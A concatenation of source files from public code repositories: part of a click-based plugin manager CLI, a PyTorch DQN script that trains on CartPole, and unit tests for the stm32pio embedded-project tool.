This takes the same arguments as :func:`command` but\n        immediately registers the created command with this instance by\n        calling into :meth:`add_command`.\n        \"\"\"\n        command = click.command\n\n        def decorator(f):\n            cmd = command(*args, **kwargs)(f)\n            self.add_command(cmd)\n            return cmd\n        return decorator\n\n\n@click.group(cls=MyCLI)\ndef _plugins():\n    pass \n\n\n@_plugins.command()\n@click.option('--show-folder',\"-sf\",default=False, is_flag=True,help=\"Open plugins folder.\")\n@click.option('--install',\"-i\",\"file\",default=None,type=click.Path(exists=True,dir_okay=False), help=\"Install to plugins folder.\") #\n@click.pass_context\ndef plugins(ctx,show_folder,file):\n    \"\"\"\n    Manage plugins. Show folder or install plugin.\n    Calling it directly shows a list of all currently available plugins.\n    \"\"\"\n    if show_folder:\n        import subprocess\n        click.echo(f\"Plugins stored in: {plugin_folder}\")\n        subprocess.run(f\"cd {plugin_folder}\\nopen .\\n\",shell=True)\n        return \n    if file:\n        from shutil import copyfile\n        from cli.ok import menu\n        cmds = menu.list_commands(ctx)\n        click.echo(f\"Current commands: {cmds}\")\n        name=click.prompt(\"Enter a different name for your plugin\")\n        if name in cmds:\n            click.echo(f'!Failed. <{name}> is already in use.')\n            ctx.exit()\n        copyfile(file,os.path.join(plugin_folder,f\"{name}.py\"))\n        click.echo(f\"Command <{name}> installed to plugins folder.\")\n        return\n\n    # display installed plugin list \n    rv = list_plugins()\n    click.echo(f'Currently installed plugins: {rv}')","repo_name":"rocksnow1942/mymodule","sub_path":"cli/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"64329518","text":"import gym\nimport math\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom collections import namedtuple\nfrom itertools import count\nfrom PIL import Image\nimport os,time\n\nimport torch\nfrom torch import mode\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nfrom IPython import display\n\n# The game caps episodes at 200 steps (env._max_episode_steps)\n# unwrapped removes this limit so an episode can run for any number of steps\nenv = gym.make('CartPole-v0').unwrapped\n\n# Play one episode at random\n# env.step(0): cart moves left, env.step(1): cart moves right\n# env.reset()\n# for t in count(): \n#     env.render()\n#     leftOrRight = random.randrange(env.action_space.n)\n#     _, reward, done, _ = env.step(leftOrRight)\n#     if done:\n#         break\n\n\nenv.reset()\n\n\n# plt.ion()\n\n# if gpu is to be used\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(\"device:\", device)\n\n# state, action, next state, reward\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))\n\n# Fixed-length buffer; entries are overwritten cyclically via self.position\nclass ReplayMemory(object):\n\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self.memory = []\n        self.position = 0\n\n    def push(self, *args):\n        \"\"\"Saves a transition.\"\"\"\n        if len(self.memory) < self.capacity:\n            self.memory.append(None)\n        self.memory[self.position] = Transition(*args)\n        self.position = (self.position + 1) % self.capacity\n\n    def sample(self, batch_size):\n        return random.sample(self.memory, batch_size)\n\n    def calc(self):\n        reward = 0.0 \n        for t in self.memory:\n            if t.next_state is not None:\n                reward += 1\n        return reward/self.capacity\n\n    def __len__(self):\n        return len(self.memory)\n\nclass DQN(nn.Module):\n\n    def __init__(self, h, w, outputs):\n        super(DQN, self).__init__()\n        self.conv1 = 
nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1)\n        self.conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n        self.conv3 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n        self.conv4 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n        self.conv5 = nn.Conv2d(32, 1, kernel_size=1, stride=1)\n        self.head = nn.Linear(600, outputs)\n\n    # Called with a single element to determine the next action, or with a batch during optimization. Returns tensor([[left0exp,right0exp]...]).\n    def forward(self, x):\n        x = F.relu(self.conv1(x)) #[B, 3, 20, 30] => [B, 32, 20, 30] (stride 1, padding 1 keeps the spatial size)\n        x = F.relu(self.conv2(x)) #[B, 32, 20, 30] => [B, 32, 20, 30]\n        x = F.relu(self.conv3(x)) #[B, 32, 20, 30] => [B, 32, 20, 30]\n        x = F.relu(self.conv4(x)) #[B, 32, 20, 30] => [B, 32, 20, 30]\n        x = F.relu(self.conv5(x)) #[B, 32, 20, 30] => [B, 1, 20, 30]\n        x = x.view(x.size(0), -1)\n        return self.head(x) #[B, 600] => [B, 2]\n\nresize = T.Compose([T.ToPILImage(),\n                    T.Grayscale(num_output_channels=1),\n                    T.Resize(20),\n                    T.ToTensor(),\n                    T.Normalize(mean=(0.5,),std=(0.5,))])\ndef get_screen():\n    screen = env.render(mode='rgb_array')\n    return resize(screen).to(device)\n\nenv.reset()\n# plt.figure()\n# plt.imshow(get_screen().cpu().squeeze().numpy())\n# plt.title('Example extracted screen')\n# plt.show()\n\nBATCH_SIZE = 512\n# Discount weight for future scores. The smaller it is, the faster the return is bounded by 1/(1-GAMMA), but the less influence the most distant steps have, so it must not be too small\n# If the return is squeezed too small the loss becomes tiny, the MSE gradient becomes very small, and learning gets hard\nGAMMA = 0.9\n\nEPS_START = 0.9\nEPS_END = 0.05\nEPS_DECAY = 1000000.\nTARGET_UPDATE = 10\nMODEL_File = 'data/save/14_checkpoint.tar'\n\n\n# Get the screen size so that the layers can be initialized correctly for the shapes returned by the AI gym.\n# With the transforms above the typical size here is about 1x20x30\n# This is the result of clipping and downscaling the render buffer in get_screen()\ninit_screen = get_screen()\n_, screen_height, screen_width = init_screen.shape # [C,H,W]\n\n# Number of actions from the gym action space: just two, left or right\nn_actions = env.action_space.n\n\n# training (policy) network\npolicy_net = DQN(screen_height, screen_width, n_actions).to(device)\n\nprint(policy_net)\n\n# a prediction (target) network would hold the previous training parameters relative to policy_net\n\nmemory = ReplayMemory(100000)\n\n# total number of training steps so far\nsteps_done = 0\n# rough average number of steps per episode when acting fully at random\navg_step = 20\nif os.path.exists(MODEL_File):\n    checkpoint = torch.load(MODEL_File, map_location=device)\n    policy_net_sd = checkpoint['policy_net']\n    steps_done = checkpoint['steps_done']\n    avg_step = checkpoint['avg_step']\n    policy_net.load_state_dict(policy_net_sd)\n\n# Start with random actions and gradually switch to predicted ones (random fraction decays 0.9 --> 0.05); returned action shape: [B, 1]\nnet_actions_count=torch.tensor([0,0], device=device, dtype=torch.long)\ndef select_action(state):\n    global steps_done\n    sample = random.random()\n    eps_threshold = EPS_END + (EPS_START - EPS_END) * \\\n        math.exp(-1. 
* steps_done / EPS_DECAY)\n    steps_done += 1\n    if sample > eps_threshold:\n        with torch.no_grad():\n            # t.max(1) returns the largest column value of each row.\n            # The second element of the max result is the index of the largest element, so we pick the action with the larger expected reward.\n            action = policy_net(state).max(1)[1].view(1, 1)\n            net_actions_count[action]+=1\n            return action\n    else:\n        return torch.tensor([[random.randrange(n_actions)]], device=device, dtype=torch.long)\n\nepisode_durations = []\n\ndef plot_durations():\n    plt.figure(2)\n    plt.clf()\n    durations_t = torch.tensor(episode_durations, dtype=torch.float)\n    plt.title('Training...')\n    plt.xlabel('Episode')\n    plt.ylabel('Duration')\n    plt.plot(durations_t.numpy())\n    # Take 100-episode averages and plot them too\n    if len(durations_t) >= 100:\n        means = durations_t.unfold(0, 100, 1).mean(1).view(-1)\n        means = torch.cat((torch.zeros(99), means))\n        plt.plot(means.numpy())\n\n    plt.pause(0.001)  # pause a moment so the plot gets updated\n\n\ndef optimize_model():\n    if len(memory) < BATCH_SIZE:\n        return\n    # Sample a batch of [(state, action, next_state, reward), ...]\n    transitions = memory.sample(BATCH_SIZE)\n    # Transpose the batch (see https://stackoverflow.com/a/19343/3343043 for a detailed explanation).\n    # This converts a batch-array of Transitions into a Transition of batch-arrays.\n    # [T(a=1,b=2),T(a=1,b=2),T(a=1,b=2)] ==> T(a=(1,1,1),b=(2,2,2)) \n    batch = Transition(*zip(*transitions))\n    # Compute a mask of non-final states and concatenate the batch elements (a final state is the one after the simulation ends)\n    # e.g. [True,True] Shape [BATCH_SIZE]\n    non_final_mask = torch.tensor(tuple(map(lambda s: s is not None,\n                                            batch.next_state)), device=device, dtype=torch.bool)\n    # [<=BATCH_SIZE, 3, 20, 30]\n    non_final_next_states = torch.stack([s for s in batch.next_state if s is not None])\n    # [BATCH_SIZE, 3, 20, 30]\n    state_batch = torch.stack(batch.state)\n    # e.g. [[1],[1]] Shape [BATCH_SIZE, 1]\n    action_batch = torch.cat(batch.action)\n    # e.g. [1, 1] Shape [BATCH_SIZE]\n    reward_batch = torch.cat(batch.reward)\n    \n    # Compute Q(s_t, a) - the model computes Q(s_t), then we select the columns of the actions taken.\n    # These are the actions policy_net would have taken for each batch state,\n    # i.e. the score corresponding to the action actually taken \n    # e.g. [[6.2464],[3.2442]] shape [BATCH_SIZE,1]\n    state_action_values = policy_net(state_batch).gather(1, action_batch)\n    # Compute V(s_{t+1}) for all next states\n    # The expected values of actions for non_final_next_states would normally be computed with an 'older' target_net; \n    # because BatchNorm2d parameters are involved, eval() would be needed while the current policy_net is in train() mode, which is why a separate target_net is usually created\n    # max(1)[0] selects the best score of the next state. This is merged based on the mask, so we get the expected score, or 0 when the state is final.\n    # Predict the best score of the next state; if there is no next step its value stays 0, shape: [BATCH_SIZE]\n    next_state_values = torch.zeros(BATCH_SIZE, device=device)\n    # e.g. [6.4941, 0.0000] Shape [BATCH_SIZE]\n    with torch.no_grad():\n        next_state_values[non_final_mask] = policy_net(non_final_next_states).max(1)[0]\n    # expected best next-step score * discount + this step's reward = total expected score\n    # e.g. [6.8447, 0] Shape [BATCH_SIZE]\n    expected_state_action_values = (next_state_values * GAMMA) + reward_batch\n\n    # Compute the Huber loss\n    # We want the current state score to match the (discounted) next state score: if the next state scores higher the current action is encouraged, otherwise it is suppressed\n    # To minimize this error we use the Huber loss. When the error is small the Huber loss acts like the mean squared error,\n    # but when the error is large it acts like the mean absolute error - this makes it more robust to outliers when the estimates are very noisy.\n    # Within [-1, 1] it uses plain MSE: 1/2*(y-f(x))^2, elsewhere L1Loss: |y-f(x)| \n    loss = F.smooth_l1_loss(state_action_values, expected_state_action_values.unsqueeze(1))\n\n    # Optimize the model\n    optimizer.zero_grad()\n    loss.backward()\n    for param in policy_net.parameters():\n        param.grad.data.clamp_(-1, 1)\n    optimizer.step()\n    return loss\n\n# Keep the learning rate very small; RMSprop did not seem to learn here\noptimizer = optim.Adam(policy_net.parameters(),lr=1e-4)\n# optimizer = optim.RMSprop(policy_net.parameters(),lr=1e-5)\n\nnum_episodes = 5000000\nstep_episode_update = 0.\nstate = torch.zeros((3, 20, 30)).to(device) \nfor i_episode in range(num_episodes):\n    # Initialize the environment and state\n    env.reset()\n    state[2] = get_screen()\n    # last_screen = get_screen() # [1, 3, 40, 60]\n    # current_screen = get_screen() # [1, 3, 40, 60]\n    # state = current_screen - last_screen # [1, 3, 40, 60] \n    # reward_proportion = memory.calc() \n 
avg_loss = 0.\n    for t in count():\n        # Choose and perform an action\n        action = select_action(state.unsqueeze(0))\n        action_value = action.item()\n\n        observation_, _reward, done, _ = env.step(action_value)\n\n        # Reward individual steps only; penalize the terminal outcome \n        if done:\n            _reward = -1.0\n        else:\n            # Earlier actions influence what follows more, so earlier rewards are larger\n            _reward = math.exp(-1. * t / avg_step) \n\n        # This kind of reward clearly injects hand-made rules; consider it cheating\n        # x, x_dot, theta, theta_dot = observation_ \n        # # r1 scores the gap between the cart's horizontal displacement x and the x limit\n        # r1 = math.exp((env.x_threshold - abs(x))/env.x_threshold) - math.exp(1)/2\n        # # r2 scores the gap between the pole angle theta from vertical and the maximum angle\n        # r2 = math.exp((env.theta_threshold_radians - abs(theta))/env.theta_threshold_radians) - math.exp(1)/2\n        # # The total reward combines r1 and r2, accounting for both position and angle.\n        # _reward = r1 + r2 \n\n        reward = torch.tensor([_reward], device=device)\n\n        # Observe the new state; next state = current screen - previous screen? More robust to noise? All state predictions are pixel differences\n        current_screen = get_screen()\n        if not done:\n            next_state = torch.zeros((3, 20, 30)).to(device) \n            next_state[0] = state[1]\n            next_state[1] = state[2]\n            next_state[2] = current_screen \n        else:\n            next_state = None\n\n        # Store the transition as a normal RL sample\n        memory.push(state, action, next_state, reward)\n\n        # Perform one step of the optimization (on the target network)\n        loss = optimize_model()\n\n        if loss is not None: \n            avg_loss += loss.item() \n\n        if next_state is None:\n            state = torch.zeros((3, 20, 30)).to(device)\n        else:\n            state = next_state\n\n        if done or t>=1000:\n            # episode_durations.append(t + 1)\n            # plot_durations()\n            break\n\n    step_episode_update += t\n    \n    # Dynamically adjust GAMMA based on the loss to speed up convergence\n    avg_loss = avg_loss / t\n    # if avg_loss>1: \n    #     GAMMA = GAMMA * 0.999\n    # elif avg_loss<0.01:\n    #     GAMMA = min(GAMMA * 1.001, 0.999) \n\n    # Update the target network, copying all weights and biases of the DQN\n    if i_episode % TARGET_UPDATE == 0 and loss is not None:\n        net_actions_count_value = net_actions_count.cpu().numpy()\n        avg_step = avg_step*0.99 + step_episode_update/TARGET_UPDATE*0.01 \n        print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()),\\\n            i_episode, steps_done, \"%.2f/%.2f\"%(step_episode_update/TARGET_UPDATE, avg_step), \\\n            \"loss:\", avg_loss, \\\n            \"action_random: %.2f\"%(EPS_END + (EPS_START - EPS_END) * math.exp(-1. * steps_done / EPS_DECAY)), \\\n            \"action:\", net_actions_count_value/sum(net_actions_count_value), \"GAMMA:\", GAMMA )\n        step_episode_update = 0.\n\n        if i_episode % 1000 == 0:\n            torch.save({ 'policy_net': policy_net.state_dict(),\n                'steps_done': steps_done,\n                'avg_step': avg_step,\n                }, MODEL_File+\"_\"+str(steps_done))\n        else:\n            torch.save({ 'policy_net': policy_net.state_dict(),\n                'steps_done': steps_done,\n                'avg_step': avg_step,\n                }, MODEL_File)\n\nprint('Complete')\nenv.render()\nenv.close()\nplt.ioff()\nplt.show()","repo_name":"one-leaf/pytorch","sub_path":"04/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":13587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"22660329514","text":"import collections.abc\nimport configparser\nimport contextlib\nimport io\nimport logging\nimport platform\nimport string\nimport subprocess\nimport time\nimport unittest.mock\n\nfrom functools import reduce\nfrom typing import Mapping, Union\n\n# Provides test constants and definitions\nimport stm32pio.core.pio\nfrom tests.common import *\n\nimport stm32pio.core.settings\nimport stm32pio.core.project\nimport stm32pio.core.cubemx\nimport stm32pio.core.util\n\n\nclass TestUnit(CustomTestCase):\n    \"\"\"\n    Test the single method. As we at some point decided to use a class instead of the set of scattered functions we need\n    to do some preparations for almost every test (e.g. 
instantiate the class, create the PlatformIO project, etc.),\n    though, so the architecture now is way less modular\n    \"\"\"\n\n    def test_generate_code(self):\n        \"\"\"\n        Check whether files and folders have been created (by STM32CubeMX)\n        \"\"\"\n        project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n        project.generate_code()\n\n        # Assume that the presence of these files indicates success\n        files_should_be_present = ['Src/main.c', 'Inc/main.h']\n        for file in files_should_be_present:\n            with self.subTest(msg=f\"{file} hasn't been created\"):\n                self.assertEqual(STAGE_PATH.joinpath(file).is_file(), True)\n\n    def test_pio_init(self):\n        \"\"\"\n        Consider the existence of a 'platformio.ini' file as showing a successful PlatformIO project initialization.\n        There are other artifacts that can be checked too but we are interested only in a 'platformio.ini' anyway. Also,\n        check that it is a correct configparser.ConfigParser file and is not empty\n        \"\"\"\n        project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n        result = project.pio_init()\n\n        self.assertEqual(result, 0, msg=\"Non-zero return code\")\n        self.assertTrue(STAGE_PATH.joinpath('platformio.ini').is_file(), msg=\"platformio.ini is not there\")\n\n        platformio_ini = configparser.ConfigParser(interpolation=None)\n        self.assertGreater(len(platformio_ini.read(STAGE_PATH.joinpath('platformio.ini'))), 0,\n                           msg='platformio.ini is empty')\n\n    def test_patch(self):\n        \"\"\"\n        Check that the new parameters have been added, modified ones have been updated and existing parameters haven't\n        gone. Also, check that unnecessary folders are deleted\n        \"\"\"\n        project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n\n        header = inspect.cleandoc('''\n            ; This is a test config .ini file\n            ; with a comment. 
It emulates a real\n ; platformio.ini file\n ''') + '\\n'\n test_content = header + inspect.cleandoc('''\n [platformio]\n include_dir = this s;789hould be replaced\n let's add some tricky content\n ; there should appear a new parameter\n test_key3 = this should be preserved\n alright?\n\n [test_section]\n test_key1 = test_value1\n test_key2 = 123\n ''') + '\\n'\n STAGE_PATH.joinpath('platformio.ini').write_text(test_content)\n STAGE_PATH.joinpath('include').mkdir()\n\n project.patch()\n\n with self.subTest():\n self.assertFalse(STAGE_PATH.joinpath('include').is_dir(), msg=\"'include' has not been deleted\")\n\n original_test_config = configparser.ConfigParser(interpolation=None)\n original_test_config.read_string(test_content)\n\n patched_config = configparser.ConfigParser(interpolation=None)\n patch_config = configparser.ConfigParser(interpolation=None)\n patch_config.read_string(project.config.get('project', 'platformio_ini_patch_content'))\n\n patched_content = STAGE_PATH.joinpath('platformio.ini').read_text()\n patched_config.read_string(patched_content)\n self.assertGreater(len(patched_content), 0)\n\n for patch_section in patch_config.sections():\n self.assertTrue(patched_config.has_section(patch_section), msg=f\"{patch_section} is missing\")\n for patch_key, patch_value in patch_config.items(patch_section):\n self.assertEqual(patched_config.get(patch_section, patch_key, fallback=None), patch_value,\n msg=f\"{patch_section}: {patch_key}={patch_value} is missing or incorrect in the \"\n \"patched config\")\n\n for original_section in original_test_config.sections():\n self.assertTrue(patched_config.has_section(original_section),\n msg=f\"{original_section} from the original config is missing\")\n for original_key, original_value in original_test_config.items(original_section):\n # We've already checked patch parameters so skip them\n if not patch_config.has_option(original_section, original_key):\n self.assertEqual(patched_config.get(original_section, original_key), original_value,\n msg=f\"{original_section}: {original_key}={original_value} is corrupted\")\n\n self.assertIn(header, patched_content, msg='Header should be preserved')\n\n def test_build_should_handle_error(self):\n \"\"\"\n Build an empty project so PlatformIO should return an error\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n project.pio_init()\n\n with self.assertLogs(level='ERROR') as logs:\n self.assertNotEqual(project.build(), 0, msg=\"Build error was not indicated\")\n # next() - Technique to find something in array, string, etc. (or to indicate that there is no of such)\n self.assertTrue(next((True for item in logs.output if \"PlatformIO build error\" in item), False),\n msg=\"Error message does not match\")\n\n def test_start_editor(self):\n \"\"\"\n Call the editors. 
Use subprocess shell=True as it works on all OSes\n \"\"\"\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n\n editors = { # some editors to check\n 'atom': {\n 'Windows': 'atom.exe',\n 'Darwin': 'Atom',\n 'Linux': 'atom'\n },\n 'code': {\n 'Windows': 'Code.exe',\n 'Darwin': 'Visual Studio Code',\n 'Linux': 'code'\n },\n 'subl': {\n 'Windows': 'sublime_text.exe',\n 'Darwin': 'Sublime',\n 'Linux': 'sublime'\n }\n }\n\n # Look for the command presence in the system so we test only installed editors\n if platform.system() == 'Windows':\n command_template = string.Template(\"where $editor /q\")\n else:\n command_template = string.Template(\"command -v $editor\")\n\n for editor, editor_process_names in editors.items():\n if subprocess.run(command_template.substitute(editor=editor), shell=True).returncode == 0:\n editor_exists = True\n else:\n editor_exists = False\n\n if editor_exists:\n with self.subTest(command=editor, name=editor_process_names[platform.system()]):\n project.start_editor(editor)\n\n time.sleep(1) # wait a little bit for app to start\n\n if platform.system() == 'Windows':\n command_arr = ['wmic', 'process', 'get', 'description']\n else:\n command_arr = ['ps', '-A']\n # \"encoding='utf-8'\" is for \"a bytes-like object is required, not 'str'\" in \"assertIn\"\n result = subprocess.run(command_arr, stdout=subprocess.PIPE, encoding='utf-8')\n # TODO: or, for Python 3.7 and above:\n # result = subprocess.run(command_arr, capture_output=True, encoding='utf-8')\n self.assertIn(editor_process_names[platform.system()], result.stdout)\n\n def test_init_path_not_found_should_raise(self):\n \"\"\"\n Pass a non-existing path and expect the error\n \"\"\"\n path_does_not_exist_name = 'does_not_exist'\n\n path_does_not_exist = STAGE_PATH.joinpath(path_does_not_exist_name)\n with self.assertRaisesRegex(FileNotFoundError, path_does_not_exist_name,\n msg=\"FileNotFoundError has not been raised or doesn't contain a description\"):\n stm32pio.core.project.Stm32pio(path_does_not_exist)\n\n def test_save_config(self):\n \"\"\"\n Explicitly save the config to a file and look did that actually happen and whether all the information was\n preserved\n \"\"\"\n # 'board' is non-default, 'project'-section parameter\n project = stm32pio.core.project.Stm32pio(STAGE_PATH, parameters={'project': {'board': PROJECT_BOARD}})\n\n # Merge additional parameters\n retcode = project.save_config({\n 'project': {\n 'additional_test_key': 'test_value'\n }\n })\n\n self.assertEqual(retcode, 0, msg=\"Return code of the method is non-zero\")\n self.assertTrue(STAGE_PATH.joinpath(stm32pio.core.settings.config_file_name).is_file(),\n msg=f\"{stm32pio.core.settings.config_file_name} file hasn't been created\")\n\n config = configparser.ConfigParser(interpolation=None)\n self.assertGreater(len(config.read(STAGE_PATH.joinpath(stm32pio.core.settings.config_file_name))), 0,\n msg=\"Config is empty\")\n for section, parameters in stm32pio.core.settings.config_default.items():\n for option, value in parameters.items():\n with self.subTest(section=section, option=option,\n msg=\"Section/key is not found in the saved config file\"):\n self.assertNotEqual(config.get(section, option, fallback=\"Not found\"), \"Not found\")\n\n self.assertEqual(config.get('project', 'board', fallback=\"Not found\"), PROJECT_BOARD,\n msg=\"'board' has not been set\")\n self.assertEqual(config.get('project', 'additional_test_key', fallback=\"Not found\"), 'test_value',\n msg=\"Merged config is not present in the saved file\")\n\n def 
test_get_platformio_boards(self):\n \"\"\"\n PlatformIO identifiers of boards are requested using PlatformIO CLI in JSON format\n \"\"\"\n boards = stm32pio.core.pio.get_boards()\n\n self.assertIsInstance(boards, collections.abc.MutableSequence)\n self.assertGreater(len(boards), 0, msg=\"boards list is empty\")\n self.assertTrue(all(isinstance(item, str) for item in boards), msg=\"some list items are not strings\")\n\n def test_ioc_file_provided(self):\n \"\"\"\n Test a correct handling of a case when the .ioc file was specified instead of the containing directory\n \"\"\"\n\n # Create multiple .ioc files\n shutil.copy(STAGE_PATH.joinpath(PROJECT_IOC_FILENAME), STAGE_PATH.joinpath('42.ioc'))\n shutil.copy(STAGE_PATH.joinpath(PROJECT_IOC_FILENAME), STAGE_PATH.joinpath('Abracadabra.ioc'))\n\n project = stm32pio.core.project.Stm32pio(STAGE_PATH.joinpath('42.ioc')) # pick just one\n self.assertTrue(project.cubemx.ioc.path.samefile(STAGE_PATH.joinpath('42.ioc')),\n msg=\"Provided .ioc file hasn't been chosen\")\n self.assertEqual(project.config.get('project', 'ioc_file'), '42.ioc',\n msg=\"Provided .ioc file is not in the config\")\n\n def test_validate_environment(self):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n\n with self.subTest(msg=\"Valid config\"):\n result_should_be_ok = project.validate_environment()\n self.assertTrue(result_should_be_ok.succeed, msg=\"All the tools are correct but the validation says \"\n \"otherwise\")\n\n with self.subTest(msg=\"Invalid config\"):\n project.config.set('app', 'platformio_cmd', 'this_command_doesnt_exist')\n result_should_fail = project.validate_environment()\n self.assertFalse(result_should_fail.succeed, msg=\"One tool is incorrect and the results should reflect \"\n \"this\")\n platformio_result = next((result for result in result_should_fail if result.name == 'platformio_cmd'), None)\n self.assertIsNotNone(platformio_result, msg=\"PlatformIO validation results not found\")\n self.assertFalse(platformio_result.succeed, msg=\"PlatformIO validation results should be False\")\n\n def test_inspect_ioc(self):\n with self.subTest(msg=\"Parsing an .ioc file\"):\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, PROJECT_IOC_FILENAME, logger=logging.getLogger('any'))\n self.assertSequenceEqual(config.sections(), [stm32pio.core.cubemx.IocConfig.fake_section_name],\n msg=\"Incorrect set of config sections\", seq_type=list)\n self.assertGreater(len(config[config.fake_section_name].keys()), 10, msg=\"There should be a lot of keys\")\n\n with self.subTest(msg=\"Inspecting a proper config\"):\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, PROJECT_IOC_FILENAME, logger=logging.getLogger('any'))\n with contextlib.redirect_stderr(io.StringIO()) as logs:\n config.inspect(PROJECT_BOARD)\n self.assertEqual(logs.getvalue(), '', msg=\"Correctly set config shouldn't produce any warnings\")\n\n with self.subTest(msg=\"Inspecting an invalid config\"):\n invalid_content = inspect.cleandoc('''\n board=SOME-BOARD-123\n # board is wrong and no other parameters at all\n ''') + '\\n'\n invalid_ioc = STAGE_PATH / 'invalid.ioc'\n invalid_ioc.write_text(invalid_content)\n config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, 'invalid.ioc', logger=logging.getLogger('any'))\n with self.assertLogs(logger='any', level=logging.WARNING) as logs:\n config.inspect(PROJECT_BOARD)\n self.assertEqual(len(logs.records), 4, msg=\"There should be 4 warning log messages\")\n\n with self.subTest(msg=\"Custom board with unmatched MCUs\"):\n ioc_content = inspect.cleandoc('''\n 
board=custom\n                ProjectManager.DeviceId=some_wrong_mcu\n            ''') + '\\n'\n            invalid_ioc = STAGE_PATH / 'invalid.ioc'\n            invalid_ioc.write_text(ioc_content)\n            config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, 'invalid.ioc', logger=logging.getLogger('any'))\n            with self.assertLogs(logger='any', level=logging.WARNING) as logs:\n                config.inspect(PROJECT_BOARD, 'STM32F031K6T6')\n            self.assertTrue(any('MCU' in line for line in logs.output), msg=\"No mention of mismatched MCUs\")\n\n        with self.subTest(msg=\"Saving the config back\"):\n            ioc_file = STAGE_PATH / PROJECT_IOC_FILENAME\n            initial_content = ioc_file.read_text()\n            config = stm32pio.core.cubemx.IocConfig(STAGE_PATH, PROJECT_IOC_FILENAME, logger=logging.getLogger('any'))\n\n            config.save()\n            self.assertEqual(ioc_file.read_text(), initial_content, msg=\"Configs should be identical\")\n\n            changed_board = \"INTEL-8086\"\n            config[config.fake_section_name]['board'] = changed_board\n            config.save()\n            self.assertIn(f'board={changed_board}', ioc_file.read_text(), msg=\"Edited parameters weren't preserved\")\n\n    def test_clean(self):\n        def plant_fs_tree(path: Path, tree: Mapping[str, Union[str, Mapping]], exist_ok: bool = True):\n            for endpoint, content in tree.items():\n                if isinstance(content, collections.abc.Mapping):\n                    (path / endpoint).mkdir(exist_ok=exist_ok)\n                    plant_fs_tree(path / endpoint, content, exist_ok=exist_ok)\n                elif type(content) == str and len(content):\n                    (path / endpoint).write_text(content)\n                else:\n                    (path / endpoint).touch()\n\n        def flatten_tree(tree, root: Path = None):\n            tree_paths = []\n            for endpoint, content in tree.items():\n                tree_paths.append(Path(endpoint) if root is None else (root / endpoint))\n                if isinstance(content, collections.abc.Mapping):\n                    tree_paths.extend(flatten_tree(content, root=Path(endpoint) if root is None else (root / endpoint)))\n            return tree_paths\n\n        def tree_exists_fully(path: Path, tree: Mapping[str, Union[str, Mapping]]):\n            tree_paths = flatten_tree(tree, root=path)\n            actual_paths = list(path.rglob('*'))\n            return all(endpoint in actual_paths for endpoint in tree_paths)\n\n        def tree_not_exists_fully(path: Path, tree: Mapping[str, Union[str, Mapping]]):\n            tree_paths = flatten_tree(tree, root=path)\n            actual_paths = list(path.rglob('*'))\n            return all(endpoint not in actual_paths for endpoint in tree_paths)\n\n        test_tree = {\n            'root_file.txt': '',\n            'root empty folder': {},\n            'root_folder': {\n                'nested_file.mp3': '',\n                'nested_folder': {\n                    'file_in_nested_folder_1.jpg': '',\n                    'file in nested folder 2.png': ''\n                }\n            }\n        }\n        test_tree_endpoints = flatten_tree(test_tree)\n\n        plant_fs_tree(STAGE_PATH, test_tree)\n        with self.subTest(msg=\"quiet\"):\n            project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n            project.clean()\n            self.assertTrue(tree_not_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree hasn't been removed\")\n            self.assertTrue(project.cubemx.ioc.path.exists(), msg=\".ioc file wasn't preserved\")\n\n        self.setUp()  # same actions we perform between test cases (external cleaning)\n        plant_fs_tree(STAGE_PATH, test_tree)\n        with self.subTest(msg=\"not quiet, respond yes\"):\n            project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n            with unittest.mock.patch('builtins.input', return_value=stm32pio.core.settings.yes_options[0]):\n                project.clean(quiet=False)\n                input_args, input_kwargs = input.call_args  # input() function was called with these arguments\n                input_prompt = input_args[0]\n                # Check only for a name as the path separator is different for UNIX/Win\n                self.assertTrue(all(endpoint.name in input_prompt for endpoint in 
test_tree_endpoints),\n                                msg=\"Paths for removal should be reported to the user\")\n                self.assertTrue(tree_not_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree hasn't been removed\")\n                self.assertTrue(project.cubemx.ioc.path.exists(), msg=\".ioc file wasn't preserved\")\n\n        self.setUp()\n        plant_fs_tree(STAGE_PATH, test_tree)\n        with self.subTest(msg=\"not quiet, respond no\"):\n            project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n            with unittest.mock.patch('builtins.input', return_value=stm32pio.core.settings.no_options[0]):\n                project.clean(quiet=False)\n                self.assertTrue(tree_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree wasn't preserved\")\n                self.assertTrue(project.cubemx.ioc.path.exists(), msg=\".ioc file wasn't preserved\")\n\n        self.setUp()\n        plant_fs_tree(STAGE_PATH, test_tree)\n        with self.subTest(msg=\"user's ignore list\"):\n            ignore_list = [\n                f'{STAGE_PATH.name}.ioc',\n                'root_file.txt',\n                'this_path_doesnt_exist_yet',\n                